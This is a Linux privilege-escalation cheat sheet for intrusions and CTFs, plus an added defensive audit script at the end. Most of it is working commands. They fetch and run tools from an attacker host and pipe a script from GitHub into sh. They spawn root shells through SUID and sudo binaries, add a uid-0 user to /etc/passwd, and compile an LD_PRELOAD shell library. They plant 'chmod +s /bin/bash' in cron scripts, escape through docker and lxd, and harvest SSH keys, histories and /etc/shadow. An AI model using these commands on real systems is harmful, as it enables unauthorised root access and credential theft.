Privilege escalation involves exploiting misconfigurations or vulnerabilities to move from a low-privileged user (www-data, normal user) to root. It is a critical phase in any real-world intrusion or CTF challenge.
```bash
# Download and run LinPEAS directly on target:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Transfer from attacker machine (HTTP server):
# On attacker:
python3 -m http.server 8000
# On victim:
wget http://YOUR_IP:8000/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh 2>/dev/null | tee /tmp/linpeas_output.txt
# Show only high-criticality findings:
/tmp/linpeas.sh -a 2>/dev/null | grep -E "\[.\+.\]|\[!\]"
```
```bash
# Find SUID binaries:
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Dangerous SUID examples:
# /usr/bin/find — execute command as root:
find /tmp -exec /bin/bash -p \; 2>/dev/null
# /usr/bin/vim — open shell:
vim -c ':!/bin/bash'
# /usr/bin/python3:
python3 -c 'import os; os.execl("/bin/bash","bash","-p")'
# /usr/bin/cp — overwrite /etc/passwd:
openssl passwd -1 hacked123
# replace HASH with the openssl output above
echo "hacker:HASH:0:0:root:/root:/bin/bash" >> /etc/passwd
su hacker
```
```bash
# Check allowed sudo commands:
sudo -l
# Common exploitable entries:
# (ALL) NOPASSWD: /usr/bin/python3
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
# (ALL) NOPASSWD: /usr/bin/find
sudo find / -exec /bin/bash \; -quit
# (ALL) NOPASSWD: /usr/bin/less
sudo less /etc/passwd
# inside less: !bash
# LD_PRELOAD technique (if env_keep+=LD_PRELOAD in sudoers):
cat > /tmp/shell.c << 'EOF'
#include <stdlib.h>     /* unsetenv, system */
#include <unistd.h>     /* setgid, setuid */
#include <sys/types.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0); setuid(0);
    system("/bin/bash");
}
EOF
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so allowed_command
```
```bash
# List system cron jobs:
cat /etc/crontab
ls -la /etc/cron.d/ /etc/cron.daily/
crontab -l
# Monitor running processes to catch crons (pspy64):
wget http://YOUR_IP:8000/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64
/tmp/pspy64
# If a cron executes a script we can write to:
echo 'chmod +s /bin/bash' >> /path/to/script.sh
# Wait for cron to run, then:
/bin/bash -p
```
```bash
# Search for hardcoded passwords:
grep -r "password" /etc/ 2>/dev/null | grep -v "^Binary"
grep -r "passwd\|secret\|credential" /var/www/ 2>/dev/null
# Command history:
cat ~/.bash_history
cat ~/.zsh_history
# SSH keys:
find /home -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
# SQLite databases with hashes:
find / -name "*.db" -o -name "*.sqlite" 2>/dev/null
```
```bash
# Find services only listening on localhost:
ss -tlnp
netstat -tlnp 2>/dev/null
# Forward internal port to attacker machine via SSH:
ssh -L 8080:127.0.0.1:8080 user@victim
# Access from browser at localhost:8080
```
```bash
# Check current user groups:
id
groups
# docker group — mount host filesystem:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# disk group — read disk blocks directly:
debugfs /dev/sda1
# inside debugfs: cat /etc/shadow
# lxd/lxc group:
lxc init ubuntu:16.04 test -c security.privileged=true
lxc config device add test mydev disk source=/ path=/mnt/root recursive=true
lxc start test && lxc exec test /bin/sh
```
| Vector | Check Command |
|---|---|
| Dangerous SUID | find / -perm -4000 -type f 2>/dev/null |
| Sudo permissions | sudo -l |
| System cron jobs | cat /etc/crontab |
| Live processes | ./pspy64 |
| Passwords in configs | grep -r "password" /etc/ 2>/dev/null |
| Internal ports | ss -tlnp |
| Dangerous groups | id → docker, disk, lxd |
| Auto-enumeration | ./linpeas.sh |
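As an added example (not part of the original sheet), a small POSIX sh audit that checks three of the vectors summarised above from the defender's side: sudoers rules granting NOPASSWD on the shell-capable binaries listed in this sheet or passing LD_PRELOAD through env_keep, /etc/crontab entries whose script is world-writable, and membership in the docker/disk/lxd groups. It reads sudoers and crontab files given as arguments (not `sudo -l` output) plus `id` output as a string; the inputs in demo() are constructed samples.

```shell
# Defensive audit of three vectors from the sheet: risky sudo rules,
# world-writable cron scripts and dangerous groups. Inputs are arguments, so
# each function runs on the constructed samples in demo() or on real files.
# Binaries the sheet shows yielding a root shell under sudo; ALL = any command.
SHELL_CAPABLE="ALL python3 find less vim cp"
# sudoers_findings FILE: print one line per risky rule in a sudoers file.
sudoers_findings() {
    sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$1" | while IFS= read -r line; do
        case "$line" in *env_keep*LD_PRELOAD*)
            echo "LD_PRELOAD survives sudo: $line"; continue ;;
        esac
        case "$line" in *NOPASSWD:*) ;; *) continue ;; esac
        # Everything after the NOPASSWD: tag is a comma-separated command list.
        for cmd in $(printf '%s' "${line#*NOPASSWD:}" | tr ',' ' '); do
            for b in $SHELL_CAPABLE; do
                if [ "${cmd##*/}" = "$b" ]; then echo "NOPASSWD shell-capable: $cmd"; fi
            done
        done
    done
}

# cron_findings FILE: flag /etc/crontab entries whose script is world-writable.
cron_findings() {
    sed -e 's/#.*//' -e '/^[[:space:]]*$/d' -e '/^[A-Za-z_]*=/d' "$1" |
    while read -r min hour dom mon dow user cmd; do
        script=${cmd%% *}   # first token of the command field
        case "$script" in /*) ;; *) continue ;; esac
        if [ -n "$(find "$script" -prune -perm -002 2>/dev/null)" ]; then
            echo "world-writable cron script: $script (runs as $user)"
        fi
    done
}

# group_findings "ID_OUTPUT": dangerous supplementary groups in `id` output.
group_findings() {
    printf '%s\n' "${1##*groups=}" | tr ',' '\n' |
        sed 's/^[0-9]*(\(.*\))$/\1/' | grep -x -E 'docker|disk|lxd|lxc'
}
# Constructed sample inputs, not taken from a real host.
demo() {
    tmp=$(mktemp -d)
    printf 'Defaults env_keep += "LD_PRELOAD"\nroot ALL=(ALL) ALL\n%s\n' \
        'www-data ALL=(ALL) NOPASSWD: /usr/bin/find, /usr/bin/id' > "$tmp/sudoers"
    printf '#!/bin/sh\n' > "$tmp/backup.sh" && chmod 666 "$tmp/backup.sh"
    printf 'SHELL=/bin/sh\n*/5 * * * * root %s --quiet\n' "$tmp/backup.sh" > "$tmp/crontab"
    sudoers_findings "$tmp/sudoers"; cron_findings "$tmp/crontab"
    group_findings "uid=33(www-data) gid=33(www-data) groups=33(www-data),999(docker)"
    rm -rf "$tmp"
}
demo
```

Each function prints nothing when it finds nothing, so the script can be run from a cron job or a CI check and alerted on non-empty output.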